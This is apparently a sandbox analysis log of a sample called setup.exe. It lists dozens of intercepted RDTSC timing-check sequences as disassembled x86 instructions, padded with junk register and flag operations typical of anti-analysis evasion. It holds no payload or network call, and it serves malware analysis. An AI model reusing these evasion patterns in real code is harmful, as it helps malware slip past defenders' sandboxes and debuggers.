Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D802DB second address: 4D80355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6572h 0x00000009 xor eax, 7880E5C8h 0x0000000f jmp 00007FF32CDD656Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 or edx, dword ptr [ebp+0Ch] 0x0000001b jmp 00007FF32CDD6576h 0x00000020 test edx, 61000000h 0x00000026 pushad 0x00000027 call 00007FF32CDD656Dh 0x0000002c push esi 0x0000002d pop ebx 0x0000002e pop ecx 0x0000002f popad 0x00000030 jne 00007FF39F4048B7h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF32CDD6576h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80355 second address: 4D8035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8035B second address: 4D8035F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8035F second address: 4D80371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [esi+48h], 00000001h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80371 second address: 4D80375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80375 second address: 4D8037B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D8037B second address: 4D803AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov dl, 95h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FF39F404881h 0x00000011 jmp 00007FF32CDD656Eh 0x00000016 test bl, 00000007h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov bx, 7F60h 0x00000020 mov edx, 57E2318Ch 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70876 second address: 4D708DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 27h 0x00000005 jmp 00007FF32CFB7204h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e pushad 0x0000000f call 00007FF32CFB71FEh 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007FF32CFB71FDh 0x00000020 jmp 00007FF32CFB71FBh 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 xchg eax, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF32CFB7205h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D708DC second address: 4D709B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6577h 0x00000009 and eax, 27D16CAEh 0x0000000f jmp 00007FF32CDD6579h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov edx, 5274DA0Eh 0x00000021 call 00007FF32CDD656Fh 0x00000026 call 00007FF32CDD6578h 0x0000002b pop esi 0x0000002c pop ebx 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f jmp 00007FF32CDD656Eh 0x00000034 mov esi, dword ptr [ebp+08h] 0x00000037 jmp 00007FF32CDD6570h 0x0000003c sub ebx, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FF32CDD656Ah 0x00000047 and ah, 00000018h 0x0000004a jmp 00007FF32CDD656Bh 0x0000004f popfd 0x00000050 pushfd 0x00000051 jmp 00007FF32CDD6578h 0x00000056 adc cl, 00000078h 0x00000059 jmp 00007FF32CDD656Bh 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D709B7 second address: 4D70A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF32CFB71FFh 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test esi, esi 0x0000000f jmp 00007FF32CFB7202h 0x00000014 je 00007FF39F5ECBA2h 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF32CFB71FEh 0x00000021 sub eax, 43B94D38h 0x00000027 jmp 00007FF32CFB71FBh 0x0000002c popfd 0x0000002d mov ah, 67h 0x0000002f popad 0x00000030 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000037 jmp 00007FF32CFB71FBh 0x0000003c mov ecx, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70A27 second address: 4D70A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70A2B second address: 4D70A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70A31 second address: 4D70AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CDD6578h 0x00000009 adc cx, F1F8h 0x0000000e jmp 00007FF32CDD656Bh 0x00000013 popfd 0x00000014 jmp 00007FF32CDD6578h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c je 00007FF39F40BE90h 0x00000022 pushad 0x00000023 jmp 00007FF32CDD656Eh 0x00000028 push esi 0x00000029 mov ecx, edx 0x0000002b pop edx 0x0000002c popad 0x0000002d test byte ptr [77436968h], 00000002h 0x00000034 jmp 00007FF32CDD6578h 0x00000039 jne 00007FF39F40BE6Ah 0x0000003f jmp 00007FF32CDD6570h 0x00000044 mov edx, dword ptr [ebp+0Ch] 0x00000047 jmp 00007FF32CDD6570h 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FF32CDD6577h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70AF5 second address: 4D70B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c mov ah, 71h 0x0000000e pop edi 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 or cl, 00000038h 0x00000018 jmp 00007FF32CFB71FBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FF32CFB7204h 0x00000027 xor esi, 6FA05A98h 0x0000002d jmp 00007FF32CFB71FBh 0x00000032 popfd 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007FF32CFB7206h 0x0000003b sub eax, 7A5D04F8h 0x00000041 jmp 00007FF32CFB71FBh 0x00000046 popfd 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70B91 second address: 4D70BD8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6578h 0x00000008 and si, 5F58h 0x0000000d jmp 00007FF32CDD656Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF32CDD6575h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70BD8 second address: 4D70BE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CFB71FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70BE8 second address: 4D70BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov bx, cx 0x0000000d push eax 0x0000000e push edx 0x0000000f movzx esi, di 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70BFA second address: 4D70C06 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C06 second address: 4D70C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007FF32CDD656Bh 0x0000000d and al, FFFFFFDEh 0x00000010 jmp 00007FF32CDD6579h 0x00000015 popfd 0x00000016 popad 0x00000017 push dword ptr [ebp+14h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF32CDD656Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C75 second address: 4D70C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C79 second address: 4D70C95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6578h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70C95 second address: 4D70CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF32CFB7205h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D70CBC second address: 4D70CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jmp 00007FF32CDD656Eh 0x0000000f mov esp, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF32CDD6577h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80D7D second address: 4D80D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80D8C second address: 4D80DE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, F0h 0x00000005 pushfd 0x00000006 jmp 00007FF32CDD6570h 0x0000000b adc ecx, 6D1D8CD8h 0x00000011 jmp 00007FF32CDD656Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF32CDD6574h 0x00000022 xor ch, 00000038h 0x00000025 jmp 00007FF32CDD656Bh 0x0000002a popfd 0x0000002b mov edi, ecx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov bx, 3280h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80AD7 second address: 4D80ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80ADD second address: 4D80B01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B01 second address: 4D80B05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B05 second address: 4D80B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B0B second address: 4D80B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CFB7203h 0x00000008 pop ecx 0x00000009 mov cx, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF32CFB71FCh 0x00000019 jmp 00007FF32CFB7205h 0x0000001e popfd 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B52 second address: 4D80B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6577h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FF32CDD6576h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FF32CDD656Ah 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4D80B94 second address: 4D80B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4E0073D second address: 4E00765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF32CDD656Bh 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CDD6570h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF09EF second address: 4DF09F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF09F3 second address: 4DF0A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A10 second address: 4DF0A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A16 second address: 4DF0A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A1A second address: 4DF0A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A28 second address: 4DF0A2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A2E second address: 4DF0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0A32 second address: 4DF0A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF080B second address: 4DF0848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF32CFB71FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF32CFB71FEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0848 second address: 4DF085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF085A second address: 4DF0883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF32CFB7205h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0883 second address: 4DF08A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CDD656Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0C27 second address: 4DF0CCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB7201h 0x00000009 or cx, AB96h 0x0000000e jmp 00007FF32CFB7201h 0x00000013 popfd 0x00000014 movzx ecx, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c movzx esi, dx 0x0000001f call 00007FF32CFB71FBh 0x00000024 pushfd 0x00000025 jmp 00007FF32CFB7208h 0x0000002a or ecx, 048D1E18h 0x00000030 jmp 00007FF32CFB71FBh 0x00000035 popfd 0x00000036 pop eax 0x00000037 popad 0x00000038 mov dword ptr [esp], ebp 0x0000003b jmp 00007FF32CFB71FFh 0x00000040 mov ebp, esp 0x00000042 pushad 0x00000043 mov ebx, esi 0x00000045 mov dx, si 0x00000048 popad 0x00000049 push dword ptr [ebp+0Ch] 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF32CFB7209h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0CCF second address: 4DF0CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0CDF second address: 4DF0CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF32CFB71FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0CF6 second address: 4DF0D2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 jmp 00007FF32CDD656Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e call 00007FF32CDD6569h 0x00000013 jmp 00007FF32CDD6570h 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e mov eax, 37BA5829h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0D2E second address: 4DF0D6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FF32CFB7209h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF32CFB71FCh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0D6E second address: 4DF0D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD656Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DF0D80 second address: 4DF0DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007FF32CFB7209h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF32CFB71FDh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0526 second address: 4DA052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA052C second address: 4DA0530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0530 second address: 4DA05A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c call 00007FF32CDD6570h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 popad 0x00000015 mov dword ptr [esp], ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FF32CDD656Dh 0x0000001f and ax, E536h 0x00000024 jmp 00007FF32CDD6571h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007FF32CDD6570h 0x00000030 sbb ecx, 2AE92C58h 0x00000036 jmp 00007FF32CDD656Bh 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05A5 second address: 4DA05A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05A9 second address: 4DA05AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05AF second address: 4DA05F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b jmp 00007FF32CFB7200h 0x00000010 push FDA9B50Dh 0x00000015 jmp 00007FF32CFB7201h 0x0000001a add dword ptr [esp], 79980B0Bh 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov bl, ah 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA05F1 second address: 4DA0649 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD656Fh 0x00000008 add ch, FFFFFFDEh 0x0000000b jmp 00007FF32CDD6579h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov edi, esi 0x00000015 popad 0x00000016 call 00007FF32CDD6569h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF32CDD6579h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0649 second address: 4DA0679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB7201h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF32CFB7201h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov esi, ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0679 second address: 4DA0731 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6579h 0x00000008 and ax, D986h 0x0000000d jmp 00007FF32CDD6571h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FF32CDD6570h 0x0000001b add ch, 00000028h 0x0000001e jmp 00007FF32CDD656Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007FF32CDD6579h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jmp 00007FF32CDD6571h 0x00000035 pop eax 0x00000036 jmp 00007FF32CDD656Eh 0x0000003b mov eax, dword ptr fs:[00000000h] 0x00000041 pushad 0x00000042 mov dx, ax 0x00000045 mov ecx, 176D2139h 0x0000004a popad 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FF32CDD656Eh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0731 second address: 4DA0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0740 second address: 4DA0747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 94h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0747 second address: 4DA0806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FF32CFB7207h 0x0000000d nop 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF32CFB7204h 0x00000015 add ax, 5808h 0x0000001a jmp 00007FF32CFB71FBh 0x0000001f popfd 0x00000020 push eax 0x00000021 pop ecx 0x00000022 popad 0x00000023 sub esp, 1Ch 0x00000026 pushad 0x00000027 mov esi, edx 0x00000029 mov cx, di 0x0000002c popad 0x0000002d push esi 0x0000002e jmp 00007FF32CFB7202h 0x00000033 mov dword ptr [esp], ebx 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FF32CFB71FEh 0x0000003d adc ch, FFFFFFC8h 0x00000040 jmp 00007FF32CFB71FBh 0x00000045 popfd 0x00000046 mov edx, ecx 0x00000048 popad 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movsx edx, si 0x00000050 pushfd 0x00000051 jmp 00007FF32CFB7208h 0x00000056 xor ecx, 77A45258h 0x0000005c jmp 00007FF32CFB71FBh 0x00000061 popfd 0x00000062 popad 0x00000063 rdtsc
